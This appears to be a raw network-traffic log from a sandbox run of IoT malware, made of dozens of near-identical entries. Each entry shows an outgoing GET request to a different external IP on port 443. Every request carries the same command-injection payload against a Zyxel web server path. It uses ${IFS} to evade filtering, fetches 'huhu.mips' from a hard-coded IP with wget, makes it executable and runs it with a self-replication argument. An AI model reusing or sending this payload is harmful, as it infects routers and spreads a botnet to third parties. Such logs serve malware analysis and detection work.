                                                      Feb 2, 2024 06:36:06.930984020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7706192.168.2.1458420168.163.120.147443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.931018114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7707192.168.2.145924657.3.25.155443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.931051016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7708192.168.2.1436442163.105.173.26443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.931076050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7709192.168.2.14548642.201.221.168443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.931133986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7710192.168.2.1448598200.9.249.35443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.931186914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7711192.168.2.1437692206.63.100.151443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.931205988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7712192.168.2.1454344152.4.154.25443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.931288958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7713192.168.2.145911617.173.224.98443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.931310892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7714192.168.2.145401014.74.64.22443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.931350946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7715192.168.2.145531057.0.144.35443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.931381941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7716192.168.2.145855464.4.109.80443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.931416035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7717192.168.2.144078695.180.112.172443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.931448936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7718192.168.2.145251439.58.155.128443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.931480885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7719192.168.2.1435726178.190.22.83443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.931526899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7720192.168.2.145654673.216.39.153443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.931544065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7721192.168.2.1435462155.61.81.116443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.931585073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7722192.168.2.144299861.230.146.137443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.931632042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7723192.168.2.145149859.169.48.200443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.931670904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7724192.168.2.145000074.187.46.74443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.931704044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7725192.168.2.1440850126.83.251.55443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.931730986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7726192.168.2.145014884.142.215.221443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.931792021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7727192.168.2.1446010208.125.49.241443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.931833982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7728192.168.2.144021062.34.222.78443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.931894064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7729192.168.2.145323263.203.219.172443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.931935072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7730192.168.2.1451532117.191.23.191443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.931996107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7731192.168.2.1443048134.38.53.147443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.932005882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7732192.168.2.145727442.216.221.144443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.932059050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7733192.168.2.1444936212.254.201.127443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.932101965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7734192.168.2.1457262152.205.165.42443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.932126045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7735192.168.2.1460274149.112.7.114443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.932163954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7736192.168.2.145047494.123.93.232443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.932214975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7737192.168.2.1442742117.173.87.17443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.932245016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7738192.168.2.1447558181.71.65.164443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.932296991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7739192.168.2.1452994149.50.41.209443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.932310104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7740192.168.2.145754492.102.171.164443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.932348013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7741192.168.2.1437060216.58.79.137443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.932429075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7742192.168.2.1444820185.17.67.70443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.932435989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7743192.168.2.145979284.214.94.0443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.932495117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7744192.168.2.145173875.172.38.169443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.932534933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7745192.168.2.1441362181.235.173.59443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.932579994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7746192.168.2.144118676.206.188.147443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.932624102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7747192.168.2.1444328166.234.181.96443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.932667971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7748192.168.2.1459810126.9.142.18443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.932725906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7749192.168.2.1433592217.14.38.165443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.932764053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7750192.168.2.145350086.121.85.75443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.932796001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7751192.168.2.1459496166.238.1.142443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.932821989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7752192.168.2.1438750187.89.131.244443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.932874918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7753192.168.2.1448434117.157.84.77443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.932895899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7754192.168.2.1443530119.178.255.238443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.932925940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7755192.168.2.145188049.235.237.182443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.932984114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7756192.168.2.144781284.50.33.140443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.933002949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7757192.168.2.1445690208.164.6.70443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.933048964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7758192.168.2.1445738161.32.117.242443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.933104992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7759192.168.2.144697675.185.125.114443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.933156967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7760192.168.2.144706293.213.130.197443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.933191061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7761192.168.2.1437878102.69.69.196443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.933276892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7762192.168.2.144796848.226.108.47443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.933324099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7763192.168.2.1442780149.112.229.177443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.933374882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7764192.168.2.1433680146.85.122.95443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.933440924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7765192.168.2.1434032113.226.129.141443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.933460951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7766192.168.2.145158048.64.191.122443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.933522940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7767192.168.2.1455878194.172.189.104443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.933546066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7768192.168.2.1449342151.213.222.61443
                                                      TimestampBytes transferredDirectionData
